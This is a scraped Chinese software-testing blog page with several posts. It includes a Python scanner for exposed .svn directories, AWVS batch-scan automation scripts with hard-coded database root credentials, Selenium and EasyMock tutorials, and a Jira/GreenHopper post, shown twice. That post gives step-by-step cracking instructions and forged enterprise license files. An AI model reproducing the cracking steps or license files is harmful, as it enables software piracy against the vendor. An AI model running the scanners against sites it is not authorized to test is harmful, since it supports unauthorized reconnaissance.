qileilove

svn信息泄漏探测工具(新手学python)

快放假了，比较闲，写了个svn信息泄漏的探测工具，严格意义上说和wwwscan功能差不多，判断是否存在/.svn/等目录，贴上代码：

#coding:utf-8

import sys

import httplib2

if len(sys.argv)<2:

print 'Usag:'+"svnscan.py"+" host"

sys.exit()

#判断输入url是否是http开头

if sys.argv[1].startswith('http://'):

host=sys.argv[1]

else:

host="http://"+sys.argv[1]

#访问一个不存在的目录，将返回的status和content-length做为特征

status=''

contentLen=''

http=httplib2.Http()

dirconurl=host+'/nodirinthiswebanx4dm1n/'

dirresponse=http.request(dirconurl,'GET')

status=dirresponse[0].status

contentLen=dirresponse[0].get('content-length')

#字典中保存svn的常见目录，逐个访问和特征status、content-length进行比对

f=open(r'e:\svnpath.txt','r')

pathlist=f.readlines()

def svnscan(subpath):

for svnpath in pathlist:

svnurl=host+svnpath.strip('\r\n')

response=http.request(svnurl,'GET')

if response[0].status!=status and response[0].get('content-length')!=contentLen:

print "vuln:"+svnurl

if __name__=='__main__':

svnscan(host)

f.close()

　　svnpath.txt文件中保存的常见的svn版本控制的目录路径等，借鉴了某大婶的思路，根据返回的状态码、content-length跟一个不存在的目录返回的状态码、content-length进行比对，主要目的是确保判断的准确性，因为有些站点可能会有404提示页等等。

　　目前只能想到的是存在svn目录，且权限设置不严格的，所以这个程序应该是不能准确判断是否存在漏洞，只能探测是否存在svn的目录。

　　不知道还有其它的办法来确认一个站点是否存在svn目录？目录浏览返回的状态应该也是200？还是有另外的状态码？

posted @ 2014-12-23 00:02 顺其自然EVO 阅读(511) | 评论 (0) | 编辑收藏

Python实现Awvs自动化扫描

　最近再做一个python的小程序，主要功能是实现Acuenetix Web Vulnerability Scanner的自动化扫描，批量对一些目标进行扫描，然后对扫描结果写入mysql数据库。写这篇文章，分享一下一些思路。

　　程序主要分三个功能模块，Url下载、批量扫描、结果入库，

　　有一个另外独立的程序，在流量镜像服务器上进行抓包，抓取Http协议的包，然后对包进行筛选处理，保留一些带有各种参数的url，然后对url进行入库。url下载功能主要是从mysql数据库中下载url。

　　批量扫描功能主要调用了Awvs的命令行wvs_console.exe，调研的时候先是尝试用awvs计划任务来实现批量扫描，但是发现在将一些awvs设置发包给计划任务的时候会遇到各种困难，计划任务貌似也不是一个网页，采用的是XML模版，技术有限，最后没实现，只好放弃。

　　之后发现Awvs支持命令行，wvs_console.exe就是主程序，有很多命令参数，基本能实现Awvs界面操作的所有功能。批量扫描主要是读取下载到本地的url,进行逐一扫描。要将扫描结果保存到本地access数据库文件，需要使用savetodatabase参数。

　　Awvs会自动将扫描结果保存到本地的access数据库中，具体的表是Wvs_alerts，也可以设置保存到Mssql数据库中，具体的是在Application Setting进行设置。结果入库模块的功能是从access数据库筛选出危害等级为3的漏洞，然后将它们写入到mysql数据库。主要用了正则表达式对request中的host,漏洞文件,get或post提交的请求进行筛选拼凑，获取到完整的漏洞测试url。

　　贴上代码，很菜，代码各种Bug，最主要的是程序的整个流程设计存在问题，导致后来被大佬给否掉了，没有考虑到重复扫描和程序异常中止的情况，导致我的程序只能一直运行下去，否则重新运行又会从头对url进行扫描。

　　对此很郁闷，某天晚上下班回家想了想，觉得可以通过以下方法来解决以上两个问题：

　　Awvs扫描结果数据库中有一个Wvs_scans表，保存的都是扫描过的url,以及扫描开始时间和结束时间。可以将当天下载的url保存到一个list中，然后在扫描之前先将之前所有扫描过的URL查询出来，同样保存在list中，读取list中的url,判断是否在扫描过的URL list中，如果存在将之从url list中删除掉；如果不存在则再进行扫描。

　　异常中止的话貌似只能增加系统计划任务，每天结束再打开，不知道如何时时监视系统进程，通过是否存在wvs的进程来判断。

　　以上只是一个大概的程序介绍，贴上代码，代码可能存在一些问题，有兴趣的童鞋去完善完善，大佬觉得我的效率和编码能力有待提高，so，让继续学习，所以没再继续跟进这个项目。

　　downurl.py 代码：

#coding:utf-8

import MySQLdb

import os,time,shutil

import hashlib,re

datanow=time.strftime('%Y-%m-%d',time.localtime(time.time()))

#filetype='.txt'

#urlfilename=datanow+filetype

#path="D:\wvscan\url\\"

#newfile=path+urlfilename

datanow=time.strftime('%Y-%m-%d',time.localtime(time.time()))

con=MySQLdb.Connect('10.1.1.1','root','12345678','wvsdb')

cur=con.cursor()

sqlstr='select url from urls where time like %s'

values=datanow+'%'

cur.execute(sqlstr,values)

data=cur.fetchall()

#将当天的URL保存到本地url.txt文件

f=open(r'd:\Wvscan\url.txt','a+')

uhfile=open(r'd:\Wvscan\urlhash.txt','a+')

line=uhfile.readlines()

#保存之前对url进行简单的处理，跟本地的hash文件比对，确保url.txt中url不重复

for i in range(0,len(data)):

impurl=str(data[i][0]).split('=')[0]

urlhash=hashlib.new('md5',impurl).hexdigest()

urlhash=urlhash+'\n'

if urlhash in line:

pass

else:

uhfile.write(urlhash)

newurl=str(data[i][0])+'\n'

f.writelines(newurl)

cur.close()

con.close()

抓包程序抓到的url可能重复率较高，而且都是带参数的，保存到本地的时候截取了最前面的域名+目录+文件部分进行了简单的去重。Awvs可能不大适合这样的方式，只需要将全部的域名列出来，然后逐一扫描即可，site Crawler功能会自动爬行。

　　writeinmysql.py 结果入库模块，代码：

#coding:UTF-8

import subprocess

import os,time,shutil,sys

import win32com.client

import MySQLdb

import re,hashlib

reload(sys)

sys.setdefaultencoding('utf-8')

#需要先在win服务器设置odbc源，指向access文件。实际用pyodbc模块可能更好一些

def writeinmysql():

conn = win32com.client.Dispatch(r'ADODB.Connection')

DSN = 'PROVIDER=Microsoft Access Driver (*.mdb, *.accdb)'

conn.Open('awvs')

cur=conn.cursor()

rs = win32com.client.Dispatch(r'ADODB.Recordset')

rs.Open('[WVS_alerts]', conn, 1, 3)

if rs.recordcount == 0:

exit()

#遍历所有的结果，cmp进行筛选危害等级为3的，也就是高危

while not rs.eof:

severity = str(rs('severity'))

if cmp('3', severity):

rs.movenext

continue

vultype = rs('algroup')

vulfile=rs('affects')

#由于mysql库中要求的漏洞类型和access的名称有点差别，所以还需要对漏洞类型和危害等级进行二次命名,sql注入和xss为例

xss='Cross site'

sqlinject='injection'

if xss in str(vultype):

vultype='XSS'

level='低危'

elif sqlinject in str(vultype):

vultype="SQL注入"

level='高危'

else:

level='中危'

#拼凑出漏洞测试url，用了正则表达式， post和get类型的request请求是不同的

params = rs('parameter')

ss = str(rs('request'))

str1 = ss[0:4]

if 'POST'== str1:

requestType = 'POST'

regex = 'POST (.*?) HTTP/1\.\d+'

str1 = re.findall(regex, ss);

else:

requestType = 'GET'

regex = 'GET (.*?) HTTP/1\.\d+'

str1 = re.findall(regex, ss);

regex = 'Host:(.*?)\r\n'

host = re.findall(regex, ss);

if host == []:

host = ''

else:

host = host[0].strip()

if str1 == []:

str1 = ''

else:

str1 = str1[0]

url =host + str1

timex=time.strftime('%Y-%m-%d',time.localtime(time.time()))

status=0

scanner='Awvs'

comment=''

db = MySQLdb.connect(host="10.1.1.1", user="root", passwd="12345678", db="wvsdb",charset='utf8')

cursor = db.cursor()

sql = 'insert into vuls(status,comment,vultype,url,host,params,level,scanner) values(%s,%s,%s,%s,%s,%s,%s,%s)'

values =[status,comment,vultype,'http://'+url.lstrip(),host,params,level,scanner]

#入库的时候又进行了去重，确保mysql库中没有存在该条漏洞记录，跟本地保存的vulhash进行比对，感觉这种方法很原始。

hashvalue=str(values[2])+str(values[4])+str(vulfile)+str(values[5])

vulhash=hashlib.new('md5',hashvalue).hexdigest()

vulhash=vulhash+'\n'

file=open(r'D:\Wvscan\vulhash.txt','a+')

if vulhash in file.readlines():

pass

else:

file.write(vulhash+'\n')

cursor.execute(sql, values)

delsql='delete from vuls where vultype like %s or vultype like %s'

delvaluea='Slow HTTP%'

delvalueb='Host header%'

delinfo=[delvaluea,delvalueb]

cursor.execute(delsql,delinfo)

db.commit()

rs.movenext

rs.close

conn.close

cursor.close()

db.close()

if __name_=='__main__':

writeinmysql()

time.sleep(10)

#备份每天的扫描数据库，用原始数据库替换，方便第二天继续保存。

datanow=time.strftime('%Y-%m-%d',time.localtime(time.time()))

filetype='.mdb'

urlfilename=datanow+filetype

path="D:\wvscan\databak\\"

databakfile=path+urlfilename

shutil.copyfile(r'D:\Wvscan\data\vulnscanresults.mdb',databakfile)

shutil.copyfile(r'D:\Wvscan\vulnscanresults.mdb',r'D:\Wvscan\data\vulnscanresults.mdb')

　　startwvs.py,扫描模块，这个模块问题较多，就是之前提到的，没有考虑重复扫描和异常终止的问题，贴上代码：

#coding:utf-8

import subprocess

import os,time,shutil

file=open(r"D:\Wvscan\url.txt","r")

def wvsscan():

for readline in file:

url=readline.strip('\n')

cmd=r"d:\Wvs\wvs_console.exe /Scan "+url+r" /SavetoDatabase"

doscan=subprocess.Popen(cmd)

doscan.wait()

if __name__=='__main__':

wvsscan()

English »

Options : History : Help : Feedback

Text-to-speech function is limited to 100 characters

posted @ 2014-12-23 00:01 顺其自然EVO 阅读(1169) | 评论 (0) | 编辑收藏

Selenium中常用的xpath

　selenium大部分的方法参数都是java.lang.String locator,假如我们想传入xptah表达式,可以在表达式的开头加上"xpath=",也可以不加.如下面的两个效果是一样的.

　　selenium.getAttribute("//tr/input/@type") === selenium.getAttribute("xpath=//tr/input/@type")

　　selenium中有一个比较特别而非常有用的方法

　　java.lang.Number getXpathCount(java.lang.String xpath)

　　通过此方法我们可以得到所有匹配xpath的数量,调用此方法,传入的表达式就不能以"xpath="

　　开头.

　　另外需要知道的是:当xpath表达式匹配到的内容有多个时,seleium默认的是取第一个,假如,我们想

　　自己指定第几个,可以用"xpath=(xpath表达式)[n]"来获取,例如:

　　selenium.getText("//table[@id='order']//td[@contains(text(),'删除')]");

　　在id为order的table下匹配第一个包含删除的td.

　　selenium.getText("xpath=(//table[@id='order']//td[@contains(text(),'删除')])[2]");

　　匹配第二个包含删除的td.

　　在调试xpath的时候,我们可以下个firefox的xpath插件,这样可以在页面上通过右键开启xpath插件.

　　然后随时可以检验xpath所能匹配的内容,非常方便.假如通过插件测试的xpath表达式可以匹配

　　到预期的内容,但是放到selenium中跑却拿不到,那么最有可能出现的问题是:在你调用seleium方法

　　时,传入的xpath表达式可能多加了或者是少加了"xpath=".

　　以下为几个常用的xpath:

　　1.selenium.getAttribute("//tr/input/@type")

　　2.selenium.isElementPresent("//span[@id='submit' and @class='size:12']");

　　3.selenium.isElementPresent("//tr[contains(@sytle,'display:none')]");

　　4.selenium.isElementPresent("//*[contains(name(),'a')]"); //这个等价于 //a

　　5.selenium.isElementPresent("//tr[contains(text(),'金钱')]");

posted @ 2014-12-23 00:00 顺其自然EVO 阅读(1352) | 评论 (0) | 编辑收藏

Selenium WebDriver之JavaScript

WebDriver提供了方法来同步/异步执行JavaScript代码，这是因为JavaScript可以完成一些WebDriver本身所不能完成的功能，从而让WebDriver更加灵活和强大。

　　本文中所提到的都是JAVA代码。

　　1. 在WebDriver中如何执行JavaScript代码

　　JavaScript代码总是以字符串的形式传递给WebDriver,不管你的JavaScript代码是一行还是多行，WebDriver都可以用executeScript方法来执行字符串中包含的所有JavaScript代码。

　　WebDriver driver = new FirefoxDriver();

　　JavascriptExecutor driver_js=(JavascriptExecutor)driver;

　　String js = "alert(\"Hello World!\");";

　　driver_js.executeScript( js);

　　2.同步执行JavaScript和异步执行JavaScript的区别

　　同步执行：driver_js.executeScript( js)

　　如果JavaScript代码的执行时间较短，可以选择同步执行，因为Webdriver会等待同步执行的结果，然后再运行其它的代码。

　　异步执行：driver_js.executeAsyncScript(js)

　　如果JavaScript代码的执行时间较长，可以选择异步执行，因为Webdriver不会等待其执行结果，而是直接执行下面的代码。

　　3. 用Javascript实现等待页面加载的功能

　　public void waitForPageLoad() {

　　While(driver_js.executeScript("return document.readyState" ).equals ("complete")){

　　Thread.sleep(500);

　　}

　　这样做的缺点是，没有设定timeout时间，如果页面加载一直不能完成的话，那么代码也会一直等待。当然你也可以为while循环设定循环次数，或者直接采用下面的代码：

protected Function<WebDriver, Boolean> isPageLoaded() {

return new Function<WebDriver, Boolean>() {

@Override

public Boolean apply(WebDriver driver) {

return ((JavascriptExecutor) driver).executeScript("returndocument.readyState").equals("complete");

}

};

}

public voidwaitForPageLoad() {

WebDriverWait wait = new WebDriverWait(driver, 30);

wait.until(isPageLoaded());

}

　　需要指出的是单纯的JavaScript是很难实现等待功能的，因为JavaScript的执行是不阻塞主线程的，你可以为指定代码的执行设定等待时间，但是却无法达到为其它WebDriver代码设定等待时间的目的。有兴趣的同学可以研究一下。

　　4. Javascrpt模拟点击操作，并触发相应事件

　　String js ="$(\"button.ui-multiselect.ui-widget\").trigger(\"focus\");"

　　+"$(\"button.ui-multiselect.ui-widget\").click();"

　　+"$(\"button.ui-multiselect.ui-widget\").trigger(\"open\");";

　　((JavascriptExecutor)driver).executeScript( js);

　　5. Javacript scrollbar的操作

　　String js ="var obj = document.getElementsById(\“div_scroll\”);”

　　+”obj.scrollTop= obj.scrollHeight/2;”

　　((JavascriptExecutor)driver).executeScript(js);

6. Javascript重写confirm

　　String js ="window.confirm = function(msg){ return true;}”

　　((JavascriptExecutor)driver).executeScript( js);

　　通过执行上面的js,该页面上所有的confirm将都不再弹出。

　　7. 动态载入jquery

　　并不是所有的网页都引入了Jquery，如果我们要在这些网页上执行Jquery代码，就必须动态加载Jquery source文件

　　driver.get("file:///C:/test.html");

　　boolean flag =(boolean)(driver_js).executeScript("return typeof jQuery =='undefined'");

　　if (flag)

　　{

　　driver_js.executeScript("var jq =document.createElement('script');"

　　+ "jq.type ='text/javascript'; "

　　+"jq.src ='http://ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js';"

　　+"document.getElementsByTagName('head')[0].appendChild(jq);");

　　Thread.sleep(3000);

　　}

　　waiter.waitForPageLoad();

　　driver_js.executeScript("$(\"input#testid\").val(\"test\");");

　　8. 判断元素是否存在

　　可以通过下面的办法来判断页面元素是否存在，但是缺点就是如果元素不存在，必须在抛出exception后才能知道，所以会消耗一定的时间（需要超时后才会抛出异常）。

boolean ElementExist(By Locator){

try{

driver.findElement(Locator);

return true;

}

catch(org.openqa.selenium.NoSuchElementException ex)

{

return false;

}

　　也许我们可以在JavaScript中判断页面元素是否存在，然后再将结果返回给Webdriver的Java代码。

　　页面元素

　　String js =" if(document.getElementById("XXX")){ return true; } else{ return false; }”

　　String result = ((JavascriptExecutor)driver).executeScript(js);

　　或者

　　表单元素

　　String js =" if(document.theForm.###){return true; } else{ return false; }”

　　String result = ((JavascriptExecutor)driver).executeScript(js);

　　9. 结尾

　　JavaScript在WebDriver中还可以做很多事情，但这还不是全部。比如，我们是否可以编写代码来监视在整个Webdrvier测试代码运行过程是否产生过JavaScriptError呢，答案是肯定的，有兴趣的同学可以深入研究一下。

posted @ 2014-12-22 23:57 顺其自然EVO 阅读(608) | 评论 (0) | 编辑收藏

Jira5.0+greenhopper6.1.6的安装

字体: 小中大 | 上一篇下一篇 | 打印 | 我要投稿 | 推荐标签：软件测试工具 JIRA

　　这种文章其实不太想写，更愿意找一篇然后添加到自己的有道笔记里面收藏，但网上找的真心让我上火。

　　不过不得不说一下，中国人真的很牛B，这软件啊，只要咱们想用，就肯定有人破解。对于做程序员的我来说，这是不是一种悲哀呢？用一个笑话来开题吧：

　　A：你们能不能不要这样？支持一下正版好不好？程序员也是要养家的

　　B：程序员哪来的家？

　　开始正题：

　　首先jira就装5.0的吧，比这个版本高的通过网上找的方法也是可以破解的，但是插件管理是不可以用的。

　　其实上火的就在这个地方，最刚开始是要搭一个jira+wiki。找了一个看到jira5.1.5+confluence5.3安装、破解、汉化一条龙服务的文档，于是屁颠屁颠的开始了。可是装上之后，怎么也找不到Jira中文代理上面看到的一种面板：Agile，后来自己点着点着，发现这是一个插件就是题目中提到的greenhopper。

　　于是就开始各种安装啊，但是插件管理页面上面总有一行红字，意思就是说授权信息不对之类的。于是就开始找各种版本。

　　吐糟的话就不多说了，下面开始正题了：

　　Jira安装（简单说明）：

　　1.下载5.0windows安装版

　　2.安装，下一步到需要输入授权的地方

　　3.关闭Jira服务（开始—>程序—>Jira—>Stop…）

　　Jira破解：

　　1.下载破解文件

　　2.将文件夹直接与Jira_home\atlassian-jira下的Web-Inf合并

　　3.开始Jira服务（开始—>程序—>Jira—>Start…）

　　4.Jira license如下，其实ServerID需要改成你需要输入授权信息页上面显示的那个ServerID，别的维持原状就行。

Description=JIRA\: longmaster

CreationDate=2010-02-22

ContactName=zzhcool@126.com

jira.LicenseEdition=ENTERPRISE

ContactEMail=zzhcool@126.com

Evaluation=false

jira.LicenseTypeName=COMMERCIAL

jira.active=true

licenseVersion=2

MaintenanceExpiryDate=2099-10-24

Organisation=zzh

jira.NumberOfUsers=-1

ServerID=B25B-ZTQQ-8QU3-KFBS

LicenseID=LID

LicenseExpiryDate=2099-10-24

PurchaseDate=2010-10-25

Jira汉化：

　　1.下载汉化包

　　2.将汉化包复制到：安装目录\Application Data\JIRA\plugins\installed-plugins

　　3.关闭Jira服务，再开启Jira服务就行了

　　GreenHopper安装和破解：

　　1.下载GreenHopper

　　2.用管理员登录Jira

　　3.点击右上角的"Administrator"

　　4.选择插件（Plugins）

　　5.点击install

　　6.上传插件

　　7.点击Manage Existing

　　8.找到GreenHopper，点config

　　9.输入如下内容，点add

Description=GreenHopper for JIRA 4\: longmaster

CreationDate=2010-02-21

ContactName=zzhcool@126.com

greenhopper.NumberOfUsers=-1

greenhopper.LicenseTypeName=COMMERCIAL

ContactEMail=zzhcool@126.com

Evaluation=false

greenhopper.LicenseEdition=ENTERPRISE

licenseVersion=2

MaintenanceExpiryDate=2099-10-24

Organisation=zzhcool

greenhopper.active=true

LicenseID=LID

LicenseExpiryDate=2099-10-24

PurchaseDate=2010-10-25

　　10.汉化的方式与jira的汉化方式一样，暂时还没有汉化的想法（我的jira也没有汉化），可以自己去网上

　　总结：

　　不论你是否会用这个做为项目管理软件，都应该看一下jira和confluence的软件设计，名门出身就是不一样~~~使用文档过两天项目不太紧的时候再来看怎样用吧，最近需要先Coding。

posted @ 2014-12-22 23:56 顺其自然EVO 阅读(361) | 评论 (0) | 编辑收藏

Jira5.0+greenhopper6.1.6的安装

字体: 小中大 | 上一篇下一篇 | 打印 | 我要投稿 | 推荐标签：软件测试工具 JIRA

　　这种文章其实不太想写，更愿意找一篇然后添加到自己的有道笔记里面收藏，但网上找的真心让我上火。

　　不过不得不说一下，中国人真的很牛B，这软件啊，只要咱们想用，就肯定有人破解。对于做程序员的我来说，这是不是一种悲哀呢？用一个笑话来开题吧：

　　A：你们能不能不要这样？支持一下正版好不好？程序员也是要养家的

　　B：程序员哪来的家？

　　开始正题：

　　首先jira就装5.0的吧，比这个版本高的通过网上找的方法也是可以破解的，但是插件管理是不可以用的。

　　其实上火的就在这个地方，最刚开始是要搭一个jira+wiki。找了一个看到jira5.1.5+confluence5.3安装、破解、汉化一条龙服务的文档，于是屁颠屁颠的开始了。可是装上之后，怎么也找不到Jira中文代理上面看到的一种面板：Agile，后来自己点着点着，发现这是一个插件就是题目中提到的greenhopper。

　　于是就开始各种安装啊，但是插件管理页面上面总有一行红字，意思就是说授权信息不对之类的。于是就开始找各种版本。

　　吐糟的话就不多说了，下面开始正题了：

　　Jira安装（简单说明）：

　　1.下载5.0windows安装版

　　2.安装，下一步到需要输入授权的地方

　　3.关闭Jira服务（开始—>程序—>Jira—>Stop…）

　　Jira破解：

　　1.下载破解文件

　　2.将文件夹直接与Jira_home\atlassian-jira下的Web-Inf合并

　　3.开始Jira服务（开始—>程序—>Jira—>Start…）

　　4.Jira license如下，其实ServerID需要改成你需要输入授权信息页上面显示的那个ServerID，别的维持原状就行。

Description=JIRA\: longmaster

CreationDate=2010-02-22

ContactName=zzhcool@126.com

jira.LicenseEdition=ENTERPRISE

ContactEMail=zzhcool@126.com

Evaluation=false

jira.LicenseTypeName=COMMERCIAL

jira.active=true

licenseVersion=2

MaintenanceExpiryDate=2099-10-24

Organisation=zzh

jira.NumberOfUsers=-1

ServerID=B25B-ZTQQ-8QU3-KFBS

LicenseID=LID

LicenseExpiryDate=2099-10-24

PurchaseDate=2010-10-25

Jira汉化：

　　1.下载汉化包

　　2.将汉化包复制到：安装目录\Application Data\JIRA\plugins\installed-plugins

　　3.关闭Jira服务，再开启Jira服务就行了

　　GreenHopper安装和破解：

　　1.下载GreenHopper

　　2.用管理员登录Jira

　　3.点击右上角的"Administrator"

　　4.选择插件（Plugins）

　　5.点击install

　　6.上传插件

　　7.点击Manage Existing

　　8.找到GreenHopper，点config

　　9.输入如下内容，点add

Description=GreenHopper for JIRA 4\: longmaster

CreationDate=2010-02-21

ContactName=zzhcool@126.com

greenhopper.NumberOfUsers=-1

greenhopper.LicenseTypeName=COMMERCIAL

ContactEMail=zzhcool@126.com

Evaluation=false

greenhopper.LicenseEdition=ENTERPRISE

licenseVersion=2

MaintenanceExpiryDate=2099-10-24

Organisation=zzhcool

greenhopper.active=true

LicenseID=LID

LicenseExpiryDate=2099-10-24

PurchaseDate=2010-10-25

　　10.汉化的方式与jira的汉化方式一样，暂时还没有汉化的想法（我的jira也没有汉化），可以自己去网上

　　总结：

　　不论你是否会用这个做为项目管理软件，都应该看一下jira和confluence的软件设计，名门出身就是不一样~~~使用文档过两天项目不太紧的时候再来看怎样用吧，最近需要先Coding。

posted @ 2014-12-22 23:55 顺其自然EVO 阅读(258) | 评论 (0) | 编辑收藏

测试Web应用程序的基本要素

　　今天，每个人都依赖用于商业，教育和交易目的各类网站。网站涉及到互联网。人们普遍认为，现如今样样工作都离不开互联网。不同类型的用户连接到网站上为了获取所需要的不同类型的信息。因此，网站应该根据用户的不同要求作出响应。与此同时，网站的正确的响应已经成为对于企业或组织而言至关重要的成功因素，因此，需要对其进行应彻底和频繁的测试。

　　在这里，我们将讨论通过各种方法来测试一个网站。然而，测试一个网站并不是一件容易的事，因为我们不仅需要测试客户端还需要测试服务器端。通过这些方法，我们完全可以将网站测试到只存在最少数量的错误。

　　网络测试介绍：

　　系统的客户端是由浏览器显示的，它通过Internet来连接网站的服务器.所有网络应用的核心都是存储动态内容的关系数据库。事务服务器控制了数据库与其他服务器（通常被称为“应用服务器”）之间的的交互。管理功能负责处理数据更新和数据库管理。

　　Web应用程序的广泛架构：

　　根据上述Web应用的架构，很明显，我们需要进行以下测试以确保web应用的适用性。

　　1）服务器的预期负载如何，并且在该负载下服务器需要有什么样的性能。这可以包括服务器的响应时间以及数据库查询响应时间。

　　2）哪些浏览器将被使用？

　　3）它们有怎样的连接速度？

　　4）它们是组织内部的（因此具有高连接速度和相似的浏览器）或因特网范围的（因而有各种各样的连接速度和不同的浏览器类型）？

　　5）预计客户端有怎样的性能（例如，页面应该多快出现，动画，小程序等多快可以加载并运行）？

　　对Web应用程序的开发生命周期进行描述时可能有许多专有名词，包括螺旋生命周期或迭代生命周期等等。用更批判的方式来描述最常见的做法是将其描述为类似软件开发初期软件工程技术引入之前的非结构化开发。在“维护阶段”往往充满了增加错失的功能和解决存在的问题。

　　我们需要准备回答以下问题：

　　1）是否允许存在用于服务器和内容维护/升级的停机时间？可以有多久？

　　2）要求有什么样的安全防护（防火墙，加密，密码等），它应该做到什么？怎样才可以对其进行测试？

　　3）互联网连接是否可靠？并且对备份系统或冗余的连接要求和测试有何影响？

　　4）需要什么样的流程来管理更新网站的内容，并且对于维护，跟踪，控制页面内容，图片，链接等有何要求？

　　5）对于整个网站或部分网站来说是否有任何页面的外观和图片的标准或要求？

　　6）内部和外部的链接将如何被验证和更新？多频繁？

　　7）将有多少次用户登录，是否需要测试？

　　8）CGI程序，Applets,Javascripts，ActiveX组件等如何进行维护，跟踪，控制和测试

posted @ 2014-12-22 23:47 顺其自然EVO 阅读(667) | 评论 (0) | 编辑收藏

跨浏览器测试工具推荐

有时候，在不同浏览器将下进行测试是软件测试人员与项目团队的一大挑战。在所有浏览器上运行测试用例使得测试成本非常高。特别是，当我们没有专业的设计团队，或在进行页面设计过程中没有软件验证及确认的时候，更为挑战。这是不好的部分。现在，让我们来看看有什么好的部分。

　　最棒的是，在市场上有许多免费或收费的跨浏览器兼容测试工具。最关键的是，大多数情况你可以用免费的工具来完成你的工作。如果你有非常特殊的要求，那么你可能需要一个收费的跨浏览器兼容测试工具。让我们简单介绍一下一些最好的工具：

　　1.IETab:这是我最喜欢的和最好的免费工具之一。这基本上是一个Firefox和Chrome浏览器的插件。只需简单的单击鼠标就可以从Firefox和Chrome浏览器中看到该网页在InternetExplorer中将如何被显示。

　　2.MicrosoftSuperPreview:这是微软提供的免费工具。它可以帮助你检查在各种版本的InternetExplorer下网页是如何显示的。你可以用它来测试和调试网页的布局问题。你可以在微软的网站上免费下载此工具。

　　3.SpoonBrowserSandbox:您可以使用此测试工具在几乎所有主要的浏览器下测试Web应用程序，如Firefox,Chrome和Opera。最初，它也支持IE，但在过去的几个月里，它减少了对IE的支持。

　　4.Browsershots：使用这个免费的浏览器兼容性测试工具，可以测试在任何平台和浏览器的组合应用。所以，它是最广泛使用的工具。然而由于浏览器和平台的大量组合，它需要很长时间才能显示结果。

　　5.IETester:使用这个工具，你可以在各种Windows平台测试IE各种版本的网页，如WindowsVista，Windows7和XP。

　　6.BrowserCam：这是一个收费的浏览器兼容性在线测试工具。您可以用它的试用版进行24小时200张图以内的测试。

　　7.CrossBrowserTesting:这是一个完美的测试JavaScript，Ajax和Flash网站在不同浏览器中功能的工具。它提供1周免费试用。你可以在http://crossbrowsertesting.com/上下载

　　8.CloudTesting:如果你想在各种浏览器上测试您的应用程序的浏览器兼容性，如IE，Firefox,Chrome,Opera,那么这个工具很适合你。

　　除了这些工具，还有一些其他的工具，如IENetRenderer，Browsera，AdobeBrowserLab等，通过对这些工具进行一段时间的研究和使用，就可以达到事半功倍的效果。

posted @ 2014-12-22 23:46 顺其自然EVO 阅读(457) | 评论 (0) | 编辑收藏

EasyMock构建单元测试

　1. 背景

　　单元测试作为程序的基本保障。很多时候构建测试场景是一件令人头疼的事。因为之前的单元测试都是内部代码引用的，环境自给自足。开发到了一定程度，你不得不到开始调用外部的接口来完成你的功能。而外部条件是不稳定的。你为了模拟外部环境要创建各种文件、各种数据。严重影响到单元测试的效率。EasyMock应运而生，他提供了模拟的接口和类。不用费神去构建各种烦人的环境，就能开展有效的测试。

　　2. 准备环境

　　Easymock 3.2 + JUnit 4.11

　　3. 构建测试

　　a) 实际场景

　　i. 你负责开发一个会计师的功能。但计算个人所得税的接口由外部提供（鬼知道项目经理是怎么想的）。

　　ii. 你的代码已经开发完成了。负责开发个人所得税的接口的同事老婆生了四胞胎，天天请假带孩子。接口没写完。

　　iii. 你要完成你的代码并提交测试用例。前提你个懒鬼，半点额外工作都不想做。同事老婆生孩子又不能去催。然后你在网上找到了EasyMock.......

　　b) 测试代码

　　i. 个人所得税的接口

/**

*/

package com.fitweber.wheat.interfaces;

/**

* 计算个人所得税

* @author wheatmark hajima11@163.com

* @Blog http://blog.csdn.net/super2007

* @version 1.00.00

* @project wheatMock

* @file com.fitweber.wheat.interfaces.IPersonalIncomeTax.java

* @bulidDate 2013-9-1

* @modifyDate 2013-9-1

* <pre>

* 修改记录

* 修改后版本: 修改人：修改日期: 修改内容:

* </pre>

*/

public interface IPersonalIncomeTax {

/**

* 计算个人所得税，国内，2013年7级税率

* @param income

* @param deductedBeforeTax

* @return

*/

public double calculate(double income,double deductedBeforeTax);

}

　　ii. 会计师类中计算工资方法

/**

*/

package com.fitweber.wheat;

import com.fitweber.wheat.interfaces.IPersonalIncomeTax;

/**

* 会计师类

* @author wheatmark hajima11@163.com

* @Blog http://blog.csdn.net/super2007

* @version 1.00.00

* @project wheatMock

* @file com.fitweber.wheat.Accountant.java

* @bulidDate 2013-9-1

* @modifyDate 2013-9-1

* <pre>

* 修改记录

* 修改后版本: 修改人：修改日期: 修改内容:

* </pre>

*/

public class Accountant {

private IPersonalIncomeTax personalIncomeTax;

public Accountant(){

}

public double calculateSalary(double income){

//税前扣除,五险一金中个人扣除的项目。8%的养老保险，2%的医疗保险，1%的失业保险，8%的住房公积金

double deductedBeforeTax = income*(0.08+0.02+0.01+0.08);

return income - deductedBeforeTax - personalIncomeTax.calculate(income,deductedBeforeTax);

}

/**

* @return the personalIncomeTax

*/

public IPersonalIncomeTax getPersonalIncomeTax() {

return personalIncomeTax;

}

/**

* @param personalIncomeTax the personalIncomeTax to set

*/

public void setPersonalIncomeTax(IPersonalIncomeTax personalIncomeTax) {

this.personalIncomeTax = personalIncomeTax;

}

　　iii. 测试会计师类中计算工资方法

　　或许你不知道个人所得税的计算方式。但是你可以去百度一下。对，百度上有个人所得税计算器。和2011年出台的个人所得税阶梯税率。

　　通过百度的帮忙（更多的时候你要求助于业务组的同事）你可以确认如果你同事的个人所得税的计算接口正确的话，传入国内实际收入8000.00，税前扣除1520.00。应该返回193.00的扣税额。然后我们可以设置我们的Mock对象的行为来模仿接口的传入和返回。用断言来确认会计师的计算工资的逻辑。完成了我们的测试用例。

/**

*/

package com.fitweber.wheat.test;

import static org.easymock.EasyMock.*;

import junit.framework.Assert;

import org.easymock.IMocksControl;

import org.junit.After;

import org.junit.Before;

import org.junit.Test;

import com.fitweber.wheat.Accountant;

import com.fitweber.wheat.interfaces.IPersonalIncomeTax;

/**

* 会计师测试类

* @author wheatmark hajima11@163.com

* @Blog http://blog.csdn.net/super2007

* @version 1.00.00

* @project wheatMock

* @file com.fitweber.wheat.test.AccountantTest.java

* @bulidDate 2013-9-1

* @modifyDate 2013-9-1

* <pre>

* 修改记录

* 修改后版本: 修改人：修改日期: 修改内容:

* </pre>

*/

public class AccountantTest {

private IPersonalIncomeTax personalIncomeTax;

private Accountant accountant;

/**

* @throws java.lang.Exception

*/

@Before

public void setUp() throws Exception {

IMocksControl control = createControl();

personalIncomeTax = control.createMock(IPersonalIncomeTax.class);

accountant = new Accountant();

